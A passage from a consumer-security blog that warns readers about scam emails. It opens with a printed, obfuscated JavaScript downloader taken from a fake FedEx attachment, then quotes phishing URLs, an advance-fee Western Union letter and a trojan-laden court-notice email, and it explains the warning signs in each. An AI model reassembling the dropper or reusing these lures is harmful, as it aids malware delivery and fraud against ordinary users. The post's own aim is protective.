function ooooooooo(){ccccc += ‘200’; ddddddddddddddd(); };
function xxxxxxxxx(){ccccc += ‘ };’; xxxxxxxxxx(); };
function jjjjjjjjjjjjjjjj(){ccccc += ‘.sp’; ooooooooooo(); };
function kkkkkkkkkkkk(){ccccc += ‘; x’; qqqqqqqqqqqqqqq(); };
function kkkkkkkkkkkkkk(){ccccc += ‘ar f’; zzzzzzzzzz(); };
function jjjjjjjjjjjj(){ccccc += ‘.XMLH’; ffffff(); };
function zzzzzzzz(){ccccc += ‘tat’; dddddd(); };
function rrrrrrr(){ccccc += ‘ ,fa’; hhhhhhhhhhhhh(); };
function wwwwwwwww(){ccccc += ‘nrea’; jjjjjjjj(); };
function wwwwwwwwwwwwww(){ccccc += ‘d();’; nnnnnnnn(); };
function hhhhhhhhh(){ccccc += ‘(” “)’; ssssssssss(); };
function yyyyyyyyyyyyyy(){ccccc += ‘ios’; kkkkkkkkkkkkkkk(); };
function ppppppppp(){ccccc += ‘r) {‘; zzzzzz(); };
function bbbbbbbbbbbbbb(){ccccc += ‘ va’; yyyyyy(); };
function vvvvvvvvvvvvvvvv(){ccccc += ‘com p’; cccccccccccccccc(); };
function dddddddddddd(){ccccc += ‘0000’; aaaaaaaaa(); };
function lllllll(){ccccc += ‘i++)’; qqqqqqq(); };
function wwwwwwwwwwww(){ccccc += ‘ction’; oooooooooooooooo(); };
function zzzzzzzzzzzzzzz(){ccccc += ‘cum’; vvvvvvvvv(); };
function gggggg(){ccccc += ‘new’; lllllllllll(); };
function vvvvvv(){ccccc += ‘); ‘; nnnnnnnnnn(); };
function qqqqqqqqq(){ccccc += ‘r x’; eeeeee(); };
function ffffffffffff(){ccccc += ‘ “mun’; uuuuuuuuuuu(); };
function bbbbbbbbbbbbbbbb(){ccccc += ‘St’; vvvvvvvvvvv(); };
function ccccccccccccccc(){ccccc += ‘n(‘; kkkkkkkkk(); };
function qqqqqqq(){ccccc += ‘ { va’; rrrrrrrrr(); };
function kkkkkkkkkkk(){ccccc += ‘en(“‘; rrrrrr(); };
function ddddddddddd(){ccccc += ‘nd=’; iiiiiiiii(); };
function ooooooooooooo(){ccccc += ‘fun’; wwwwwwwwwwww(); };
function llllllllll(){ccccc += ‘if’; jjjjjjjjjjjjj(); };
function uuuuuuuuuuuuu(){ccccc += ‘) { ‘; vvvvvvvvvvvvv(); };
function sssssssssssssss(){ccccc += ’17’; zzzzzzzzzzz(); };
function yyyyyyyyy(){ccccc += ‘ile(f’; yyyyyyyy(); };
function wwwwwwwwwwwwwwww(){ccccc += ‘Act’; eeeeeeeee(); };
function llllllllllll(){ccccc += ‘= ‘; gggggg(); };
function uuuuuu(){ccccc += ‘type ‘; mmmmmmmmmm(); };
function tttttttttttttt(){ccccc += ‘s.’; vvvvvvvvvvvvvvvv(); };
function mmmmmmmmm(){ccccc += ‘onseB’; eeeeeeeeeeee(); };
function dddddddddddddd(){ccccc += ‘= ‘; gggggggg(); };
function ttttttttt(){ccccc += ‘on ‘; mmmmmm(); };
function ttttttttttt(){ccccc += ‘Expa’; wwwwwwwwwwwww(); };
function tttttttttttt(){ccccc += ‘s == ‘; ooooooooo(); };
function uuuuuuuuuu(){ccccc += ‘var’; bbbbbbbbbbbbbbb(); };
function ffffffffff(){ccccc += ’52);’; yyyyyyyyyyyyyyy(); };
function ffffffffffffffff(){ccccc += ‘; t’; mmmmmmmmmmmmmm(); };
function bbbbbbbbbbbbb(){ccccc += ‘faa’; nnnnnn(); };
function yyyyyyyyyyy(){ccccc += ‘ironm’; cccccccccccc(); };
function ooooooo(){ccccc += ‘ {}; ‘; vvvvvvvvvvvv(); };
function oooooooooooooooo(){ccccc += ‘()’; uuuuuuuuu(); };
function ccccccccccccc(){ccccc += ‘ch (e’; tttttt(); };
function mmmmmmmmmmm(){ccccc += ‘aveT’; vvvvvvvvvvvvvvv(); };
function rrrrrr(){ccccc += ‘GET”,’; ccccccc(); };
function uuuuuuuuuuuuuu(){ccccc += ‘+”/do’; zzzzzzzzzzzzzzz(); };
function iiiiiiiiiiiii(){ccccc += ‘xa.s’; mmmmmmmmmmm(); };
function bbbbbbb(){ccccc += ‘trea’; oooooooooooooo(); };
function ddddddddddddd(){ccccc += ‘Ob’; oooooooooo(); };
function kkkkkk(){ccccc += ‘,0)’; qqqqqqqqqqq(); };
function cccccccc(){ccccc += ‘= ‘; yyyyyyyyyyyyyyyy(); };
function aaaaaaaaaaa(){ccccc += ‘ 4 ‘; eeeeeeee(); };
function rrrrrrrrrrrrrr(){ccccc += ‘ttp:/’; nnnnnnnnn(); }; var ccccc = ”; var xx = ”; uuuuuuuu();

By looking at the text elements in quotes (things like “ironm”, “ttp:/”, “.Ru”, etc. it’s pretty easy to see that the whole purpose of this script is to concatenate instructions which will lead your computer to some Russian website and infest your machine with code from Hell. I’m not skilled in Javascript (or, more accurately, it would take me more time than it’s worth to decrypt this script,) so suffice it to say you don’t want this on your machine.

The email looks like it’s from FedEx. Some poor computer-illiterate secretary, or your grandmother, or cousin, or someone who just used FedEx would probably think it was legitimate, download the file, unzip it, double-click on it, and Bob’s your uncle.

DON’T DO IT!

Attachments from people you don’t know, particularly .zip or .rar, are to be assiduously avoided. Trash them at once.

Please be vigilant and take good care of yourself and your loved ones.

The Old Wolf has spoken.

Never “Verify your account” as the result of an email.

Posted on by The Old Wolf

PayPale

Emails of this nature are almost guaranteed scams. If you click one of the login links, you are taken to this URL:

http://www.lazershow.ind.br/assinaturas/paypal/b0ebd1cd978575dfe45e7f31c20b2080/

which is DEFINITELY NOT A PAYPAL WEBSITE. Yes, I’m SHOUTING!

If you are foolish enough to follow instructions, here is what you’ll be providing to criminals:

PayPal2

PayPal3.jp

PayPal4

PayPal5

Now, do you really want to give your PayPal account information, your bank account details, your credit card details, and your personal address, phone number, birthdate, and social security number to thieves who have fewer morals than Al Capone and Robert Mugabe put together?

No, I didn’t think you did.

NEVER GIVE OUT FINANCIAL OR OTHER PERSONAL DETAILS OVER THE INTERNET WITHOUT BEING ABSOLUTELY SURE YOU ARE ON A TRUSTED WEBSITE!

The Old Wolf has shouted.

Attn;Beneficiary!

Posted on by The Old Wolf

The Lads from Lagos never seem to give up. What saddens me is that as long as these letters keep going out, it means that somewhere people are falling victim to this fraud.

38_021022_nigerianemailmain.jpg.CROP.original-original

From: “MR.JOHN FRANK” <office_moneygram@yahoo.com>

Subject: WELCOME TO WESTERN UNION HEAD OFFIC

WELCOME TO WESTERN UNION HEAD OFFICE
BENIN REPUBLIC COTONOU
MR.JOHN FRANK

Attn;Beneficiary,Information reaching us from our corporate headquarters now, states that you only have 72hours to effect payment for the activation of your MTCN to enable you cash up your first $5,000.00 from your total (fund us$4,800,000,00,) since you are finding it difficult to make this payment we have decided that you are to go ahead and pay whatever you have from $105US above for the activation fee since you are not able to come up with the required sum, time is of the essence here.

You are to pay what ever you have from $105US above for the activation fee we will activate your MTCN upon receipt of this payment.here is the payment for the $5,000 usd but you can not pick it up because the chairman of the western union say that before you pick that money you must pay the any amount you have from $105US above OK

Here is the Senders Information;
Sender Name, MIKE
sender last name, OGUEJI
MTCN:):759054421
Amount Sent $5000.00

Please be inform that we just give you Nine Numbers for now and the remaining one number will be giving to you as soon as you send the activation fee of $105 usd today I will give you the complete number to pick up your fest payment of $5,000.00 uas as well,

Be informed that you will have to pay the balance sum of your activation upon cashing up of your first 5,000.00 usd, also i am using this medium to inform you that failure to pay the balance sum will leave us with no option but to deactivate your mtcn of which you will and can never cash up the balance sum  I will wait to hear back from you in regard to this massage so that I will give you the information that you will use to send the $105 usd.

You are advice to get back as soon as you receive this massage so that we will furnish you with the information needed to send the activation fee of $105 usd to able us release your first payment to you as promise kindly give urgent attention we are waiting

MR.JOHN FRANK
EMAIL: (westernunion132@qq.com)
WESTERN UNION HEAD OFFICE BENIN
REPUBLIC COTONOU OPERATION MANAGER)

For what it’s worth, qq.com is a Chinese hosting outfit. For the love of Eudora Welty and the Concert of the Galaxy, never respond to emails of this nature.

☛ NO ONE IN AFRICA HAS MONEY FOR YOU. THEY ONLY WANT YOURS, AND THEY WILL HAPPILY TAKE AS MUCH AS YOU ARE WILLING TO SEND THEM. ☚

Please protect your loved ones. Make sure they understand this.

DrudgeSirenSmall NEVER SEND MONEY BY WESTERN UNION, MONEY GRAM, GREEN DOT MONEYPAK, OR ANY OTHER METHOD TO SOMEONE YOU DO NOT KNOW. YOU ARE BEING SCAMMED. DrudgeSirenSmall

To Protect Yourself from Common Scams, Do This

Posted on by The Old Wolf

FIRST:

Be Very Careful with Cashier’s Checks!

Secret Shopper Bogus Check

These are extremely easy to forge on pre-printed forms available anywhere like Staples, Office Max, etc. All the criminal needs is a laser printer.

NEVER send money to someone who has sent you a cashier’s check until you have verified with your bank that it has cleared. If the check is bogus, you can also be arrested for passing fraudulent documents. This is a rare occurrence, but it has happened and probably will happen again.

SECOND:

Do Not Use Money Transfer Services with Unknown Persons

Generic_MoneyPak_Front

We’re talking here about Western Union, MoneyGram, and Green Dot MoneyPak cards, or anything else like it.

If you send money to a criminal with Western Union or a similar service, it’s gone. You can’t get it back. If a criminal asks you to buy a Green Dot MoneyPak card and send him/her the PIN, do not do it. Your money will be gone, and you won’t get it back.

These services irresponsibly enable fraudsters all over the world to perpetrate their scams on vulnerable or unwitting people. They should be regulated in much the same was as pawn shops.

THIRD:

Do not believe everything you read on the internet, or in your email box.

Scams are rampant. Criminals all around the world want your money, and they will stop at virtually nothing to get it. An example received just yesterday.

FOURTH:

Do not click on links in emails.

If you’re curious about a link in an email, type the address in your URL box directly, like this:

walmart1

If you click on a link directly in the email, you may be redirected to a bogus site:

redirect

In this example, the link that looks like it will go to a legitimate Walmart site is actually taking you to a questionable internet marketing website that is being used by criminals.

FIFTH:

Do not click on attachments in emails unless you know who sent them.

mail

This email looks like it has attached a .PDF file. However, any attachment can be deceptive. TXT files, DOC or DOCX files, PDF files, XLS or XLSX files, and many others – all can actually be .EXE files in disguise.

If you do not know who is sending you an attachment, never click on it.

SIXTH:

Never pay money to collect a prize.

This just goes without saying. You can’t win a lottery or sweepstakes you didn’t enter. Legitimate lotteries or sweepstakes, and there are precious few of these, will never ask you for up-front money to collect a prize. Again, never send money to a stranger hoping to get a large payout. If you do, you are being robbed.

SEVENTH:

There is no Nigerian prince or government official who wants you to help get money out of the country.

nigerians

This is the “419” fraud, so named for the section of the Nigerian legal code that makes this sort of scam illegal. None of the above schemes will work if people avoid sending money to strangers using Western Union or MoneyGram or other methods. This also applies to “reshipping work” or “lonely hearts” scams. At some point, all of them will ask you to send money somewhere. Don’t Do It!

There are more ways to get scammed and one post can’t cover them all, but if everyone would follow these few simple steps, the incidence of fraud would decrease dramatically. Protect your loved ones. Educate them, or watch over their finances. Be careful out there.

The Old Wolf has spoken.

Notice to Appear in Court (Scam/Malware)

Posted on by The Old Wolf

bigstock-Malicious-malware-warning-mess-41722204-1024x819

(Thanks to Techsrus for the image)

My cubicle neighbor (at the job we just both got laid off from yesterday, but that’s another story) showed me a couple of emails he had gotten in his Gmail account – each sported the header “Notice to Appear in Court.”  I told him they were probably scam threat letters and hoping to extort money.

I got one myself today, and decided to explore it a little further.

—————-

From: “Notice to Appear in Court” <customerssupport231@kaiserarbitrationlawyers.com>
To: <redacted>

Subject: Notice to appear in court SN8157

Notice to appear in court,

Hereby you are notified that you have been scheduled to appear for your hearing that will take place in the court of Detroit in April 03, 2014 at 11:30 am.You are kindly asked to prepare and bring the documents relating to the case to court on the specified date.The copy of the court notice is attached to this letter. Please, read it thoroughly.
Note: The case may be heard by the judge in your absence if you do not come.Yours very truly,
SAMPSON Hays
Clerk of court
—————————–
Attached was a file called “Notice_to_Appear_TY4769.zip”
Unpack this zip folder and you find a file called “Court Notice.exe”. That file lasted less than one second on my desktop, as Microsoft Security Essentials immediately quarantined it. The .exe file contained a Trojan Downloader named Win32/Kuluoz.D, which Microsoft describes as follows:
Win32/Kuluoz is a trojan that tries to steal passwords that are stored in certain applications and sensitive files from your PC. This trojan could also download other malware to your PC, like other variants of Win32/Kuluoz and Win32/Sirefef, and variants of rogue security software likeWin32/FakeSysdef and Win32/Winwebsec. This threat tries to hack your email accounts and file transfer programs.
In other words, really nasty stuff.
This is a perfect example of why you should do the following things on your computer to practice safe computing:

1. Always display file extensions. This option is turned off by default by Microsoft on its newer operating systems, which in my opinion is a dangerous and foolhardy idea. This means that instead of seeing “Notice_to_Appear_TY4769.zip” and “Court Notice.exe”, you would only see “Notice_to_Appear_TY4769” and “Court Notice.” To fix this, follow the procedure below for your operating system:

To show or hide file name extensions (Windows 7)

  1. Open Folder Options by clicking the Start button Picture of the Start button, clicking Control Panel, clicking Appearance and Personalization, and then clicking Folder Options.

  2. Click the View tab, and then, under Advanced settings, do one of the following:

    • To show file name extensions, clear the Hide extensions for known file types check box, and then click OK.

    • To hide file name extensions, select the Hide extensions for known file types check box, and then click OK.

Example

To show or hide file name extensions (Windows 8)

  • Open Windows Explorer and go to “View” and then click the Options button > Change folder and search options
  • Scroll to “Hide extensions for file types is known”
  • Uncheck it and click OK.

To show or hide file name extensions (Windows XP)

  • Double Click on My Computer.
  • Click on Tools > Folder Options… in the menus.
  • Click on the View tab.
  • Remove the check from Hide extensions for known file types.
  • Click the OK button.

2) Make sure you have robust malware detection software installed. AVG Free, Microsoft Security Essentials, and Kaspersky are all good options. The first two are free, the third reasonably priced and somewhat more robust than the other two.

3) ☞ NEVER ☜ open attachments from unknown senders, especially a file that contains “.exe” anywhere in its name.

(Did I make that emphatic enough? I’d make it blink if I could.)

A lot of folks are savvy enough to spot this as a scam in an instant, but this particular email is official-looking enough to scare a lot of vulnerable computer users; the scammers don’t care if you actually appear anywhere – they just want you to open that never-to-be-sufficiently-damned attachment. If you are technically savvy and you have loved ones, either elderly or otherwise vulnerable, watch out for them. Educate them. You don’t want them becoming victims of scams or nefarious behavior like botnets.

This has been an Old Wolf public service announcement.

The Old Phishing Hole

Posted on by The Old Wolf

Thieves want your information and your money. They’ll take it any way they can get it. Eastern Europe is a hotbed of cyber-crime but, sensing the opportunity for profit, other nations are getting into the act, and the same old techniques resurface.

Here’s a typical phishing scam email which landed in my inbox today. Protect yourself, be aware, exercise safe computing, and warn your loved ones. This stands to be repeated often and loudly.

From: service@chase.com<gpwtnf@admin.net>
To: admin@chase.com

Subject: NOTICE ID : DXEUWSPLNT
Dear Chase Bank Customer
It has come to our attention that your Chase Bank account information needs to be
updated as part of our continuing commitment to protect your account and to
reduce the instance of fraud on our website. If you could please take 5-10 minutes
out of your online experience and update your personal records you will not run into
any future problems with the online service.
To update your Chase records click on the following link:
http://secureaccess.chase.glchzprjo.%5BLink Obfuscated]-wi.com/chs/chk/index.php?email_login=comcast.net/
Thank you for your patience in this matter.
Sincerely,
Ammy Smith,
Chase Bank Security Departament.
Please do not reply to this e-mail as this is only a notification. Mail sent to this address cannot be answered.
Copyright 2012, CHASE BANK SERVICE, INC. All Rights Reserved.

NICHMOKENLWJJFLDBVSKYXRCHQRWEFILLLKYSO

Right. First off, look at anything that’s green in the email above. These are red flags.

1) Garbage text. Any email that contains strings of junk or random English words strung together is trying to thwart Bayesian spam filtering. It’s a complex algorithgm that is employed by service providers and email clients to try to keep Spam from ever getting to you.

2) Mis-spellings. While human error is possible, most legitimate companies (especially large financial institutions like Chase) are pretty careful about the quality of messages they send out. Bad English, strange punctuation, odd collocations and mis-spellings are all red flags for fraudulent activity (which includes most spam, by the way).

3) Garbage or misdirected links. Just because a web address has the word “Chase” in it doesn’t mean that it’s from Chase. URL’s that contain alphabet soup are to be regarded very suspiciously. Never click on links from an email, especially if the word “money” or “finances” enters into the equation. If you have an account with Wells Fargo, for example, go directly to wellsfargo.com with your browser.

As it turns out, the link above redirects you to this URL:

http://[Link Removed].endoftheinternet.org/chs/chk/index1.php
?source=chase&customer=CrazvSTcCtTvoOIhYiLNI1bplxauXFAqWAQijzkM

(I obfuscated the link to make sure nobody actually clicks on this and goes there.) If you did, what you would see is this:

It looks very, very authentic – except for that garbage URL. In fact, the scammers copied the actual http://chase.com website exactly. If you enter your UserID and password, bingo! You’ve just given Russian cyber-criminals access to all your accounts.

Again: Never click on links inside an email. Always type addresses directly into your browser window to make sure you’re going to the real company’s website.

These particular drones aren’t through with you yet, though. If you enter your information (I put in some really insulting stuff which I can’t repeat here), you’ll be taken to this URL:

http://%5BLink Removed].chaseonline.chase.com.crazvstccttvooihyilni1bplxauxfaqwaqijzkm.
csqifywdn.endoftheinternet.org/chs/chk/email.php

which gives you this page:

So these scumsuckers not only want your financial data, they want access to your email account as well, so they can scam all your friends and send messages from your account.

If you’re aware of these antics, they seem pretty transparent. Unfortunately, a huge percentage of our population is working with computers and the Internet at a “cookbook” level, without any more than a superficial understanding of what they are doing. There’s no judgement around that – it’s great that they’re learning new skills. But if you have loved ones, especially elderly family members who fall into that category, please make sure they are watched over and educated.

Practice Safe Computing

1) Be afraid of any email that includes the words

  • “Verify your account.”
  • “Update your account.”
  • “During regular account maintenance…”
  • “Failure to update your records will result in account suspension.”

or similar things. Legitimate organizations will never ask for your ID or sensitive information by email or telephone

2) Do not click on links inside an email. Always go directly to your financial institution’s website from your browser.

3)Never send sensitive information to anyone in an email. Even if it’s legitimate, emails can be intercepted and read by the bad guys.

Be careful out there, it’s a jungle.

The Old Wolf has spoken.